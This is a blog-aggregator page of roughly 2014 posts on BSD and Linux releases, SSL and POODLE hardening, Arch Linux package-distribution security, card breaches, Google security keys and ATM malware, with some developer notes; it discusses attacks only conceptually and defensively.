Planet


Verkehrskontrolle

by Jesco Freund via My Universe »

Rein interessehalber habe ich für meinen Spiegelserver einmal ausgewertet, über welche Protokolle die Zugriffe überhaupt erfolgen. Hier das Ergebnis:
Betrachtet habe ich dabei einen Zeitraum von ca. 2 Wochen, wobei nur tatsächliche Dateizugriffe gezählt wurden — redirects und Fehler wurden nicht mit in die Auswertung einbezogen.

Das Gros der Zugriffe erfolgt immer noch über IPv4 — selbst unter Nerds scheint die Nutzung von IPv6 noch nicht sonderlich populär zu sein. Sicher, natives IPv6 direkt vom DSL-Provider ist vielerorts immer noch eher die Ausnahme. Ich hätte aber vermutet, dass es einen höheren Anteil an Nutzern von IPv6 Tunneldiensten wie etwa SixXS gibt.

Während der geringe Anteil bei IPv6 nicht gänzlich unerwartet kommt, fand ich den recht geringen Anteil der HTTPS-Nutzer dann doch zunächst schockierend. Pakete über eine ungesicherte Verbindung herunterzuladen spart zwar in geringem Maße Rechenleistung, macht es einem Angreifer aber gleichzeitig auch leichter, manipulierte Pakete unterzuschieben. Oder…?

Klar, je höher der Anteil verschlüsselter Verbindungen im Internet, am besten noch mit PFS, desto schwieriger wird die Manipulation von über das Netz verteilter Software. Doch wie sieht es konkret bei Arch Linux aus? Schauen wir uns doch einmal an, wo ein Angreifer überall aktiv werden könnte, um manipulierte Pakete (z. B. mit eingebauter Backdoor) in Umlauf zu bringen.

Zur Quelle

Eine theoretische Möglichkeit besteht natürlich bereits upstream, also bevor Software überhaupt in den Verantwortungsbereich einer Distribution gelangt. Das ist jedoch weitaus weniger trivial, als es auf den ersten Blick scheint. Man müsste sich schon auf eine Software konzentrieren, die fast überall zur Grundausstattung gehört — wie etwa die glibc, bash, OpenSSL oder gleich der Linux Kernel selbst.

In der Regel bedeutet das aber, eine Entwicklergruppe infiltrieren zu müssen — ein langwieriges und ressourcenintensives Vorhaben mit ungewissem Ausgang. Für den Erfolg einer solchen Operation sind nämlich eine ganze Reihe weiterer Faktoren entscheidend:

  • Der Infiltrator muss sich das Vertrauen der übrigen Entwickler erarbeiten (z. B. um Commit-Rechte zu erlangen)
  • Der Entwicklungsprozess der Software darf kein öffentliches Peer Review beinhalten (privatem Peer Reviewing kann man mit einer größeren Anzahl an Infiltratoren begegnen)
  • Das Entwicklungsmodell darf nicht auf einen einzigen zentralen Committer setzen (wie das etwa beim Linux Kernel der Fall ist)
  • Die Software selbst darf nicht Gegenstand allzu intensiver Überprüfung durch Dritte sein (so wie derzeit gerade beispielsweise OpenSSL)
  • Die Software darf von den Distributoren nicht allzu sehr durch eigene Patches verändert werden, wie das etwa beim Linux Kernel der Fall ist.
Sicher, eine eigene Backdoor in einer zentralen Komponente vieler Linux-Systeme ist ein äußerst lohnendes Ziel (sowohl für Cyber-Kriminelle als auch für Geheimdienste und Ermittlungsbehörden), aber mit so hohem Aufwand und Entdeckungsrisiko verbunden, dass es einfachere und vor allem kostengünstigere Wege gibt.

Baustelle

Einfacher dürfte es da schon sein, bei der Paketierung von Software für eine bestimmte Distribution manipulierend einzugreifen. Code Reviews für von Maintainern erstellten Patches sind eher die Ausnahme als die Regel, und das Risiko einer Entdeckung ist hier geringer — schließlich haben es Maintainer mit einer Vielzahl an Paketen zu tun, so dass Spezialwissen über die innere Struktur einer bestimmten Software eher die Ausnahme als die Regel darstellt.

Dennoch bleibt natürlich das Problem, dass eine bestehende Community von einem „Agenten“ infiltriert werden muss — auch hier eine langwierige und ressourcenintensive Angelegenheit; zumal sich die Reichweite eines solchen Angriffs schon auf einen Bruchteil dessen reduziert hat, was mit einer Upstream-Manipulation erreichbare wäre.

Verkehrsrowdy

Die Manipulation einer Software auf dem Verteilungsweg ist eher ein technisches Problem und bedarf keiner langwierigen Unterwanderung einer bestimmten Personengruppe. Angegriffen werden kann sowohl die Verteilung der Software-Pakete an die verschiedenen Spiegelserver, als auch die Übertragung der Software an den Endverbraucher.

Bei Arch Linux erfolgt die Synchronisation der Spiegelserver über das rsync Protokoll, und somit leider unverschlüsselt. Das ist zwar effizient, öffnet einem man-in-the-middle Angriff aber Tür und Tor. Andere Projekte wie etwa FreeBSD synchronisieren ihre Spiegel zwar ebenfalls mit rsync, nutzen dazu aber die Variante mit SSH-Tunnel.

Bei der Verteilung an den Endanwender hat bei Arch Linux letzterer das Sagen: Viele Spiegel bieten sowohl HTTP als auch HTTPS an, so dass es letztlich an jedem selbst liegt, welche Verbindungsart genutzt wird.

Das heißt jetzt… was?

Gegen Angriffe im Upstream- und Paketierungsbereich kann man sich als Endanwender kaum schützen. Für Kriminelle dürfte jedoch der vergleichsweise hohe Aufwand abschreckend sein, während diese Methode für Behörden und Geheimdienste vermutlich nicht genügend zielgerichtet einsetzbar ist, um den Rechner einer bestimmten „Person of Interest“ zu infiltrieren (was in Zeiten von Big Data nicht heißen muss, dass sie es nicht trotzdem tun).

Angriffe auf den Verteilungsweg sind einfacher umsetzbar, und je näher der Angriff am Endanwender stattfindet, desto zielgerichteter lässt er sich gegen bestimmte Personen in Stellung bringen. Schützen kann man sich davor durch geeignete Transportverschlüsselung — dann bitte aber auf allen Transportwegen, die ein Software-Paket bereist. Hier müsste das Infrastruktur-Team von Arch Linux noch deutlich nachlegen.

Die Nutzung von HTTPS für den Weg zwischen Spiegel und Endanwender schützt derzeit also nur vor einem gezielten Angriff auf eine bestimmte Person; wer mehr Reichweite möchte, greift einfach die Synchronisation zwischen den Spiegelservern an und erwischt auch so die Endanwender, die sich aufgrund der Nutzung von HTTPS in Sicherheit wägen. Trotzdem würde ich die Nutzung von HTTPS empfehlen, da immerhin eine Angriffsform erschwert und gleichzeitig der Anteil an verschlüsseltem Traffic im Internet erhöht wird.

Als letzte Verteidigungslinie bleibt schließlich noch die Paketsignatur — immerhin hat Arch Linux vor ca. zwei Jahren mit Debian & Co gleichgezogen und Pacman mit entsprechender Funktionalität ausgestattet. Glücklicherweise nutzt Arch Linux für die Verteilung der Schlüssel nicht die Spiegelserver selbst, sondern setzt dafür auf (öffentliche) Key Server und das HKP-Protokoll. Allerdings bleibt beim Anwender immer noch die wichtige Verantwortung, neue Schlüssel nur dann zu akzeptieren, wenn sie zuvor einer gründlichen Prüfung unterzogen wurden.

PC-BSD 10.1-RC1 Released

by dru via Official PC-BSD Blog »

The PC-BSD team is pleased to announce the availability of RC1 images for the upcoming PC-BSD 10.1 release.

PC-BSD Notable Changes

* KDE 4.14.2
* GNOME 3.12.2
* Cinnamon 2.2.16
* Chromium 38.0.2125.104_1
* Firefox 33.0
* NVIDIA Driver 340.24
* Lumina desktop 0.7.0-beta
* Pkg 1.3.8_3
* New AppCafe HTML5 web/remote interface, for both desktop / server usage
* New CD-sized text-installer ISO files for TrueOS / server deployments
* New Centos 6.5 Linux emulation base
* New HostAP mode for Wifi GUI utilities
* Misc bug fixes and other stability improvements

TrueOS

Along with our traditional PC-BSD DVD ISO image, we have also created a CD-sized ISO image of TrueOS, our server edition.

This is a text-based installer which includes FreeBSD 10.0-Release under the hood. It includes the following features:

* ZFS on Root installation
* Boot-Environment support
* Command-Line versions of PC-BSD utilities, such as Warden, Life-Preserver and more.
* Support for full-disk (GELI) encryption without an unencrypted /boot partition

Updating

A testing update is available for 10.0.3 users to upgrade to 10.1-RC1. To apply this update, do the following:

edit: /usr/local/share/pcbsd/pc-updatemanager/conf/sysupdate.conf (As root)

Change “PATCHSET: updates”

to:

“PATCHSET: test-updates”

% sudo pc-updatemanager check

This should show you a new “Update system to 10.1-RELEASE” patch available. To install run the following:

% sudo pc-updatemanager install 10.1-update-10152014–10

NOTICE

As with any major system upgrade, please backup important data  and files beforehand!!!

This update will automatically reboot your system several times during the various upgrade phases, please expect it to take between 30–60 minutes.

Getting media

10.1-RC1 DVD/USB media can be downloaded from here via HTTP or Torrent.

Reporting Bugs

Found a bug in 10.1? Please report it (with as much detail as possible) to our bugs database.


Auf den Hund gekommen

by Jesco Freund via My Universe »

Das jüngste Ärgernis in Zusammenhang mit SSL hört auf den Namen POODLE — und ist ausnahmsweise mal kein Implementierungsunfall (wie etwa Heartbleed einer war), sondern ein Designfehler in SSLv3, der dann zum Tragen kommt, wenn der Cipher Block Chaining Modus bei der symmetrischen Verschlüsselung verwendet wird.

Nun ist SSLv3 schon lange kein aktuelles Protokoll mehr — viele Server unterstützen es aber noch, um ältere Clients wie etwa den Internet Explorer 6 oder ältere Mobilclients nicht komplett auszusperren. Damit machen sie sich jedoch gleichermaßen anfällig für einen man-in-the-middle Angriff, bei der ein Angreifer die Verwendung einer alten Protokoll-Version und einer angreifbaren Cipher Suite erzwingt.

Ivan Ristic schätzt POODLE im Vergleich zu Heartbleed als deutlich weniger kritisch ein. Im Vergleich zum BEAST-Angriff jedoch, der auf eine ähnliche Schwachstelle zielt, sieht Ristic die neue Lücke deutlich kritischer, da zu ihrer Ausnutzung weniger Vorbedingungen erforderlich sind — aktiviertes JavaScript im Browser des Opfers genügt schon, wenn der Server nicht explizit SSLv3 verbietet.

Für mich war POODLE ein Anstoß, meine SSL-Konfiguration noch einmal zu überarbeiten. Sehr alte Clients müssen hier nun leider draußen bleiben (das gilt auch für den ein oder anderen Bot), dafür dürfen Nutzer moderner Browser nun einigermaßen sicher sein, dass die Verbindung privat bleibt und in den meisten Fällen auch Forward Secrecy bietet:



TLS 1.0 habe ich allerdings aktiviert gelassen (und damit einen 5%igen Abzug in der „Protocol Support“ Wertung in Kauf genommen), da immer noch relativ viele Browser TLS 1.1 und 1.2 nicht oder nicht sauber unterstützen; darunter der Internet Explorer bis einschließlich Version 10, Android bis einschließlich 4.3, Java 6 und Java 7, die Bots von Bing und Google, …

Ähnliches bei den Cipher Suites: Einschränkungen, die einem im SSLLabs-Rating hier 100% bescheren, schließen derzeit einige Clients aus — darunter auch Java 7 und 8 sowie diverse Suchmaschinen-Bots. Aktuelle Browser stellen zwar kein Problem dar, aber einige Feedreader wären damit auch draußen — und das ist schließlich das letzte, was man bei einem Blog möchte…

Tor-ramdisk 20141022 released

by blueness via Anthony G. Basile »

Following the latest and greatest exploit in openssl, CVE-2014-3566, aka the POODLE issue, the tor team released version 0.2.4.25.  For those of you not familiar, tor is a system of online anonymity which encrypts and bounces your traffic through relays so as to obfuscated the origin.  Back in 2008, I started a uClibc-based micro Linux distribution, called tor-ramdisk, whose only purpose is to host a tor realy in hardened Gentoo environment purely in RAM.

While the POODLE bug is an openssl issue and is resolved by the latest release 1.0.1j, the tor team decided to turn off the affected protocol, SSL v3 or TLS 1.0 or later.  They also fixed tor to avoid a crash when built using openssl 0.9.8zc, 1.0.0o, or 1.0.1j, with the ‘no-ssl3′ configuration option.  These important fixes to two major components of tor-ramdisk waranted a new release.  Take a look at the upstream ChangeLog for more information.

Since I was upgrading stuff, I also upgrade the kernel to vanilla 3.17.1 + Gentoo’s hardened-patches-3.17.1-1.extras.  All the other components remain the same as the previous release.

i686:
Homepage: http://opensource.dyc.edu/tor-ramdisk
Download:  http://opensource.dyc.edu/tor-ramdisk-downloads

x86_64:
Homepage: http://opensource.dyc.edu/tor-x86_64-ramdisk
Download:  http://opensource.dyc.edu/tor-x86_64-ramdisk-downloads

‘Spam Nation’ Publisher Discloses Card Breach

by BrianKrebs via Krebs on Security »

In the interests of full disclosure: Sourcebooks – the company that on Nov. 18 is publishing my upcoming book about organized cybercrime — disclosed last week that a breach of its Web site shopping cart software may have exposed customer credit card and personal information.

Fortunately, this breach does not affect readers who have pre-ordered Spam Nation through the retailers I’ve been recommending — Amazon, Barnes & Noble, and Politics & Prose.  I mention this breach mainly to get out in front of it, and because of the irony and timing of this unfortunate incident.

From Sourcebooks’ disclosure (PDF) with the California Attorney General’s office:

“Sourcebooks recently learned that there was a breach of the shopping cart software that supports several of our websites on April 16, 2014 – June 19, 2014 and unauthorized parties were able to gain access to customer credit card information. The credit card information included card number, expiration date, cardholder name and card verification value (CVV2). The billing account information included first name, last name, email address, phone number, and address. In some cases, shipping information was included as first name, last name, phone number, and address. In some cases, account password was obtained too. To our knowledge, the data accessed did not include any Track Data, PIN Number, Printed Card Verification Data (CVD). We are currently in the process of having a third-party forensic audit done to determine the extent of this breach.”

So again, if you have pre-ordered the book from somewhere other than Sourcebook’s site (and that is probably 99.9999 percent of you who have already pre-ordered), you are unaffected.

I think there are some hard but important lessons here about the wisdom of smaller online merchants handling credit card transactions. According to Sourcebooks founder Dominique Raccah, the breach affected approximately 5,100 people who ordered from the company’s Web site between mid-April and mid-June of this year. Raccah said the breach occurred after hackers found a security vulnerability in the site’s shopping cart software.

Experts say tens of thousands of businesses that rely on shopping cart software are a major target for malicious hackers, mainly because shopping cart software is generally hard to do well.

“Shopping cart software is extremely complicated and tricky to get right from a security perspective,” said Jeremiah Grossman, founder and chief technology officer for WhiteHat Security, a company that gets paid to test the security of Web sites.  “In fact, no one in my experience gets it right their first time out. That software must undergo serious battlefield testing.”

Grossman suggests that smaller merchants consider outsourcing the handling of credit cards to a solid and reputable third-party. Sourcebooks’ Raccah said the company is in the process of doing just that.

“Make securing credit cards someone else’s problem,” Grossman said. “Yes, you take a little bit of a margin hit, but in contrast to the effort of do-it-yourself [approaches] and breach costs, it’s worth it.”

What’s more, as an increasing number of banks begin issuing more secure chip-based cards  — and by extension more main street merchants in the United States make the switch to requiring chip cards at checkout counters — fraudsters will begin to focus more of their attention on attacking online stores. The United States is the last of the G20 nations to move to chip cards, and in virtually every country that’s made the transition the fraud on credit cards didn’t go away, it just went somewhere else. And that somewhere else in each case manifested itself as increased attacks against e-commerce merchants.

If you haven’t pre-ordered Spam Nation yet, remember that all pre-ordered copies will ship signed by Yours Truly. Also, the first 1,000 customers to order two or more copies of the book (including any combination of digital, audio or print editions) will also get a Krebs On Security-branded ZeusGard. So far, approximately 400 readers have taken us up on this offer! Please make sure that if you do pre-order, that you forward a proof-of-purchase (receipt, screen shot of your Kindle order, etc.) to spamnation@sourcebookspr.com.

Pre-order two or more copies of Spam Nation and get this “Krebs Edition” branded ZeusGard.

FreeBSD 10.1-RC3 Available

by Webmaster Team via FreeBSD News Flash »

The third RC build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

Getting snmpwalk to talk to snmpd on FreeBSD

by Dan Langille via Dan Langille's Other Diary »

Contrary to all the examples I found, it’s not easy to get snmpwalk to communicate with snmpd. I am using the net-mgmt/net-snmp port with the default configuration options. It was installed with: pkg install net-mgmt/net-snmp This is the minimal configuration file, which should be placed at /usr/local/etc/snmp/snmpd.conf: rocommunity public When starting, you should see [something [...]

Google Accounts Now Support Security Keys

by BrianKrebs via Krebs on Security »

People who use Gmail and other Google services now have an extra layer of security available when logging into Google accounts. The company today incorporated into these services the open Universal 2nd Factor (U2F) standard, a physical USB-based second factor sign-in component that only works after verifying the login site is truly a Google site.

A $17 U2F device made by Yubico.
The U2F standard (PDF) is a product of the FIDO (Fast IDentity Online) Alliance, an industry consortium that’s been working to come up with specifications that support a range of more robust authentication technologies, including biometric identifiers and USB security tokens.

The approach announced by Google today essentially offers a more secure way of using the company’s 2-step authentication process. For several years, Google has offered an approach that it calls “2-step verification,” which sends a one-time pass code to the user’s mobile or land line phone.

2-step verification makes it so that even if thieves manage to steal your password, they still need access to your mobile or land line phone if they’re trying to log in with your credentials from a device that Google has not previously seen associated with your account. As Google notes in a support document, security key “offers better protection against this kind of attack, because it uses cryptography instead of verification codes and automatically works only with the website it’s supposed to work with.”

Unlike a one-time token approach, the security key does not rely on mobile phones (so no batteries needed), but the downside is that it doesn’t work for mobile-only users because it requires a USB port. Also, the security key doesn’t work for Google properties on anything other than Chrome.

The move comes a day after Apple launched its Apple Pay platform, a wireless payment system that takes advantage of the near-field communication (NFC) technology built into the new iPhone 6, which allows users to pay for stuff at participating merchants merely by tapping the phone on the store’s payment terminal.

I find it remarkable that Google, Apple and other major tech companies continue to offer more secure and robust authentication options than are currently available to consumers by their financial institutions. I, for one, will be glad to see Apple, Google or any other legitimate player give the entire mag-stripe based payment infrastructure a run for its money. They could hardly do worse.

Soon enough, government Web sites may also offer consumers more authentication options than many financial sites.  An Executive Order announced last Friday by The White House requires the National Security Council Staff, the Office of Science and Technology Policy and the Office of Management and Budget (OMB) to submit a plan to ensure that all agencies making personal data accessible to citizens through digital applications implement multiple layers of identity assurance, including multi-factor authentication. Verizon Enterprise has a good post with additional details of this announcement.

KDEConnect in PC-BSD — Remote Control Your Desktop From Your Android Phone

by Josh Smith via Official PC-BSD Blog »

Hey guys check out our video on KDEConnect in PC-BSD on YouTube!  It’s an awesome new app that allows you to receive text messages, phone notifications, incoming calls notifications, media remote control, and more!


Banks: Credit Card Breach at Staples Stores

by BrianKrebs via Krebs on Security »

Multiple banks say they have identified a pattern of credit and debit card fraud suggesting that several Staples Inc. office supply locations in the Northeastern United States are currently dealing with a data breach. Staples says it is investigating “a potential issue” and has contacted law enforcement.

According to more than a half-dozen sources at banks operating on the East Coast, it appears likely that fraudsters have succeeded in stealing customer card data from some subset of Staples locations, including seven Staples stores in Pennsylvania, at least three in New York City, and another in New Jersey.

Framingham, Mass.-based Staples has more than 1,800 stores nationwide, but so far the banks contacted by this reporter have traced a pattern of fraudulent transactions on a group of cards that had all previously been used at a small number of Staples locations in the Northeast.

The fraudulent charges occurred at other (non-Staples) businesses, such as supermarkets and other big-box retailers. This suggests that the cash registers in at least some Staples locations may have fallen victim to card-stealing malware that lets thieves create counterfeit copies of cards that customers swipe at compromised payment terminals.

Asked about the banks’ claims, Staples’s Senior Public Relations Manager Mark Cautela confirmed that Staples is in the process of investigating a “potential issue involving credit card data and has contacted law enforcement.”

“We take the protection of customer information very seriously, and are working to resolve the situation,” Cautela said. “If Staples discovers an issue, it is important to note that customers are not responsible for any fraudulent activity on their credit cards that is reported on [in] a timely basis.”  

Spike in Malware Attacks on Aging ATMs

by BrianKrebs via Krebs on Security »

This author has long been fascinated with ATM skimmers, custom-made fraud devices designed to steal card data and PINs from unsuspecting users of compromised cash machines. But a recent spike in malicious software capable of infecting and jackpotting ATMs is shifting the focus away from innovative, high-tech skimming devices toward the rapidly aging ATM infrastructure in the United States and abroad.

Last month, media outlets in Malaysia reported that organized crime gangs had stolen the equivalent of about USD $1 million with the help of malware they’d installed on at least 18 ATMs across the country. Several stories about the Malaysian attack mention that the ATMs involved were all made by ATM giant NCR. To learn more about how these attacks are impacting banks and the ATM makers, I reached out to Owen Wild, NCR’s global marketing director, security compliance solutions.

Wild said ATM malware is here to stay and is on the rise.



BK: I have to say that if I’m a thief, injecting malware to jackpot an ATM is pretty money. What do you make of reports that these ATM malware thieves in Malaysia were all knocking over NCR machines?

OW: The trend toward these new forms of software-based attacks is occurring industry-wide. It’s occurring on ATMs from every manufacturer, multiple model lines, and is not something that is endemic to NCR systems. In this particular situation for the [Malaysian] customer that was impacted, it happened to be an attack on a Persona series of NCR ATMs. These are older models. We introduced a new product line for new orders seven years ago, so the newest Persona is seven years old.

BK: How many of your customers are still using this older model?

OW: Probably about half the install base is still on Personas.

BK: Wow. So, what are some of the common trends or weaknesses that fraudsters are exploiting that let them plant malware on these machines? I read somewhere that the crooks were able to insert CDs and USB sticks in the ATMs to upload the malware, and they were able to do this by peeling off the top of the ATMs or by drilling into the facade in front of the ATM. CD-ROM and USB drive bays seem like extraordinarily insecure features to have available on any customer-accessible portions of an ATM.

OW: What we’re finding is these types of attacks are occurring on standalone, unattended types of units where there is much easier access to the top of the box than you would normally find in the wall-mounted or attended models.

BK: Unattended….meaning they’re not inside of a bank or part of a structure, but stand-alone systems off by themselves.

OW: Correct.

BK: It seems like the other big factor with ATM-based malware is that so many of these cash machines are still running Windows XP, no?

This new malware, detected by Kaspersky Lab as Backdoor.MSIL.Tyupkin, affects ATMs from a major ATM manufacturer running Microsoft Windows 32-bit.
OW: Right now, that’s not a major factor. It is certainly something that has to be considered by ATM operators in making their migration move to newer systems. Microsoft discontinued updates and security patching on Windows XP, with very expensive exceptions. Where it becomes an issue for ATM operators is that maintaining Payment Card Industry (credit and debit card security standards) compliance requires that the ATM operator be running an operating system that receives ongoing security updates. So, while many ATM operators certainly have compliance issues, to this point we have not seen the operating system come into play.

BK: Really?

OW: Yes. If anything, the operating systems are being bypassed or manipulated with the software as a result of that.

BK: Wait a second. The media reports to date have observed that most of these ATM malware attacks were going after weaknesses in Windows XP?

OW: It goes deeper than that. Most of these attacks come down to two different ways of jackpotting the ATM. The first is what we call “black box” attacks, where some form of electronic device is hooked up to the ATM — basically bypassing the infrastructure in the processing of the ATM and sending an unauthorized cash dispense code to the ATM. That was the first wave of attacks we saw that started very slowly in 2012, went quiet for a while and then became active again in 2013.

The second type that we’re now seeing more of is attacks that start with the introduction of malware into the machine, and that kind of attack is a little less technical to get on the older machines if protective mechanisms aren’t in place.

BK: What sort of protective mechanisms, aside from physically securing the ATM?

OW: If you work on the configuration setting…for instance, if you lock down the BIOS of the ATM to eliminate its capability to boot from USB or CD drive, that gets you about as far as you can go. In high risk areas, these are the sorts of steps that can be taken to reduce risks.

BK: Seems like a challenge communicating this to your customers who aren’t anxious to spend a lot of money upgrading their ATM infrastructure.

OW: Most of these recommendations and requirements have to be considerate of the customer environment. We make sure we’ve given them the best guidance we can, but at end of the day our customers are going to decide how to approach this.

BK: You mentioned black-box attacks earlier. Is there one particular threat or weakness that makes this type of attack possible? One recent story on ATM malware suggested that the attackers may have been aided by the availability of ATM manuals online for certain older models.

OW: The ATM technology infrastructure is all designed on multivendor capability. You don’t have to be an ATM expert or have inside knowledge to generate or code malware for ATMs. Which is what makes the deployment of preventative measures so important. What we’re faced with as an industry is a combination of vulnerability on aging ATMs that were built and designed at a point where the threats and risk were not as great.



According to security firm F-Secure, the malware used in the Malaysian attacks was “PadPin,” a family of malicious software first identified by Symantec. Also, Russian antivirus firm Kaspersky has done some smashing research on a prevalent strain of ATM malware that it calls “Tyupkin.” Their write-up on it is here, and the video below shows the malware in action on a test ATM.

In a report published this month, the European ATM Security Team (EAST) said it tracked at least 20 incidents involving ATM jackpotting with malware in the first half of this year. “These were ‘cash out’ or ‘jackpotting’ attacks and all occurred on the same ATM type from a single ATM deployer in one country,” EAST Director Lachlan Gunn wrote. “While many ATM Malware attacks have been seen over the past few years in Russia, Ukraine and parts of Latin America, this is the first time that such attacks have been reported in Western Europe. This is a worrying new development for the industry in Europe”

Card skimming incidents fell by 21% compared to the same period in 2013, while overall ATM related fraud losses of €132 million (~USD $158 million) were reported, up 7 percent from the same time last year.


How do I run ~arch Perl on a stable Gentoo system?

by Andreas via the dilfridge blog »

Here's a small piece of advice for all who want to upgrade their Perl to the very newest available, but still keep running an otherwise stable Gentoo installation: These three lines are exactly what needs to go into /etc/portage/package.keywords:
dev-lang/perl
virtual/perl-*
perl-core/*
Of course, as always, bugs may be present; what you get as Perl installation is called unstable or testing for a reason. We're looking forward to your reports on our bugzilla.

VC4 driver status update

by Eric Anholt via anholt's lj »

I've just spent another week hanging out with my Broadcom and Raspberry Pi teammates, and it's unblocked a lot of my work.

Notably, I learned some unstated rules about how loading and storing from the tilebuffer work, which has significantly improved stability on the Pi (as opposed to simulation, which only asserted about following half of these rules).

I got an intro on the debug process for GPU hangs, which ultimately just looks like "run it through simpenrose (the simulator) directly. If that doesn't catch the problem, you capture a .CLIF file of all the buffers involved and feed it into RTL simulation, at which point you can confirm for yourself that yes, it's hanging, and then you hand it to somebody who understands the RTL and they tell you what the deal is." There's also the opportunity to use JTAG to look at the GPU's perspective of memory, which might be useful for some classes of problems. I've started on .CLIF generation (currently simulation-environment-only), but I've got some bugs in my generated files because I'm using packets that the .CLIF generator wasn't prepared for.

I got an overview of the cache hierarchy, which pointed out that I wasn't flushing the ARM dcache to get my writes out into system L2 (more like an L3) so that the GPU could see it. This should also improve stability, since before we were only getting lucky that the GPU would actually see our command stream.

Most importantly, I ended up fixing a mistake in my attempt at reset using the mailbox commands, and now I've got working reset. Testing cycles for GPU hangs have dropped from about 5 minutes to 2-30 seconds. Between working reset and improved stability from loads/stores, we're at the point that X is almost stable. I can now run piglit on actual hardware! (it takes hours, though)

On the X front, the modesetting driver is now merged to the X Server with glamor-based X rendering acceleration. It also happens to support DRI3 buffer passing, but not Present's pageflipping/vblank synchronization. I've submitted a patch series for DRI2 support with vblank synchronization (again, no pageflipping), which will get us more complete GLX extension support, including things like GLX_INTEL_swap_event that gnome-shell really wants.

In other news, I've been talking to a developer at Raspberry Pi who's building the KMS support. Combined with the discussions with keithp and ajax last week about compositing inside the X Server, I think we've got a pretty solid plan for what we want our display stack to look like, so that we can get GL swaps and video presentation into HVS planes, and avoid copies on our very bandwidth-limited hardware. Baby steps first, though -- he's still working on putting giant piles of clock management code into the kernel module so we can even turn on the GPU and displays on our own without using the firmware blob.

Testing status:
- 93.8% passrate on piglit on simulation
- 86.3% passrate on piglit gpu.py on Raspberry Pi

All those opcodes I mentioned in the previous post are now completed -- sadly, I didn't get people up to speed fast enough to contribute before those projects were the biggest things holding back the passrate. I've started a page at http://dri.freedesktop.org/wiki/VC4/ for documenting the setup process and status.

And now, next steps. Now that I've got GPU reset, a high priority is switching to interrupt-based render job tracking and putting an actual command queue in the kernel so we can have multiple GPU jobs queued up by userland at the same time (the VC4 sadly has no ringbuffer like other GPUs have). Then I need to clean up user <-> kernel ABI so that I can start pushing my linux code upstream, and probably work on building userspace BO caching.

Lots of new challenges ahead

by swift via Simplicity is a form of art... »

I’ve been pretty busy lately, albeit behind the corners, which leads to a lower activity within the free software communities that I’m active in. Still, I’m not planning any exit, on the contrary. Lots of ideas are just waiting for some free time to engage. So what are the challenges that have been taking up my time?

One of them is that I recently moved. And with moving comes a lot of work in getting the place into a good shape and getting settled. Today I finished the last job that I wanted to finish in my appartment in a short amount of time, so that’s one thing off my TODO list.

Another one is that I started an intensive master-after-master programme with the subject of Enterprise Architecture. This not only takes up quite some ex-cathedra time, but also additional hours of studying (and for the moment also exams). But I’m really satisfied that I can take up this course, as I’ve been wandering around in the world of enterprise architecture for some time now and want to grow even further in this field.

But that’s not all. One of my side activities has been blooming a lot, and I recently reached the 200th server that I’m administering (although I think this number will reduce to about 120 as I’m helping one organization with handing over management of their 80+ systems to their own IT staff). Together with some friends (who also have non-profit customers’ IT infrastructure management as their side-business) we’re now looking at consolidating our approach to system administration (and engineering).

I’m also looking at investing time and resources in a start-up, depending on the business plan and required efforts. But more information on this later when things are more clear :-)

Fix ALL the BUGS!

by lu_zero via Luca Barbato »

Vittorio started (with some help from me) to fix all the issues pointed by Coverity.

Static analysis

Coverity (and scan-build) are quite useful to spot mistakes even if their false-positive ratio tend to be quite high. Even the false-positives are usually interesting since the spot code unnecessarily convoluted. The code should be as simple as possible but not simpler.

The basic idea behind those tools is to try to follow the code-paths while compiling them and spot what could go wrong (e.g. you are feeding a NULL to a function that would deference it).

The problems with this approach are usually two: false positive due to the limited scope of the analyzer and false negatives due shadowing.

False Positives

Coverity might assume certain inputs are valid even if they are made impossible by some initial checks up in the codeflow.

In those case you should spend enough time to make sure Coverity is not right and those faulty inputs aren’t slipping somewhere. NEVER try to just add some checks to the code pointed as first move, you might either hide issues (e.g. if Coverity complains about uninitialized variable do not just initialize it to nothing, check why it happens and if the logic behind is wrong).

If Coverity is confused, your compiler is confused as well and will produce suboptimal executables. Properly fixing those issues can result in useful speedups. Simpler code is usually faster.

Ever increasing issue count

While fixing issues using those tools you might notice to your surprise that every time you fix something, something new appears out of thin air.

This is not magic but simply that the static analyzers usually keep some limit on how deep they go depending on the issues already present and how much time had been spent already.

That surprise had been fun since apparently some of the time limit is per compilation unit so splitting large files in smaller chunks gets us more results (while speeding up the building process thanks to better parallelism).

Usually fixing some high-impact issue gets us 3 or 5 new small impact issues.

I like solving puzzles so I do not mind having more fun, sadly I did not have much spare time to play this game lately.

Merge ALL the FIXES

Fixing properly all the issues is a lofty goal and as usual having a patch is just 1/2 of the work. Usually two set of eyes work better than one and an additional brain with different expertise can prevent a good chunk of mistakes. The review process is the other, sometimes neglected, half of solving issues.
So far about 100+ patches got piled up over the past weeks and now they are sent in small batches to ease the work of review. (I have something brewing to make reviewing simpler, as you might know)

During the review what probably about 1/10 of the patches will be rejected and the relative coverity report updated with enough information to explain why it is a false positive or the dangerous or strange behaviour pointed is intentional.

The next point release for our 4 maintained major releases: 0.8, 9, 10 and 11. Many thanks to the volunteers that spend their free time keeping all the branches up to date!

Tracking patches

by lu_zero via Luca Barbato »

You need good tools to do a good job.

Even the best tool in the hand of a novice is a club.

I’m quite fond in improving the tools I use. And that’s why I started getting involved in Gentoo, Libav, VLC and plenty of other projects.

I already discussed about lldb and asan/valgrind, now my current focus is about patch trackers. In part it is due to the current effort to improve the libav one,

Contributors

Before talking about patches and their tracking I’d digress a little on who produces them. The mythical Contributor: without contributions an opensource project would not exist.

You might have recurring contributions and unique/seldom contributions. Both are quite important.
In general you should make so seldom contributors become recurring contributors.

A recurring contributor can accept to spend some additional time to setup the environment to actually provide its contribution back to the community, a sporadic contributor could be easily put off if the effort required to send his patch is larger than writing the patch itself.

Th project maintainers should make so the life of contributors is as simple as possible.

Patches and Revision Control

Lately most opensource projects saw the light and started to use decentralized source revision control system and thanks to github and many other is the concept of issue pull requests is getting part of our culture and with it comes hopefully a wider acceptance to the fact that the code should be reviewed before it is merged.

Pull Request

In a decentralized development scenario new code is usually developed in topic branches, routinely rebased against the master until the set is ready and then the set of changes (called series or patchset) is reviewed and after some round of fixes eventually merged. Thanks to bitbucket now we have forking, spooning and knifing as part of the jargon.

The review (and merge) step, quite properly, is called knifing (or stabbing): you have to dice, slice and polish the code before merging it.

Reviewing code

During a review bugs are usually spotted as well way to improve are suggested. Patches might be split or merged together and the series reworked and improved a lot.

The process is usually time consuming, even more for an organization made of volunteer: writing code is fun, address issues spotted is not so much, review someone else code is much less even.

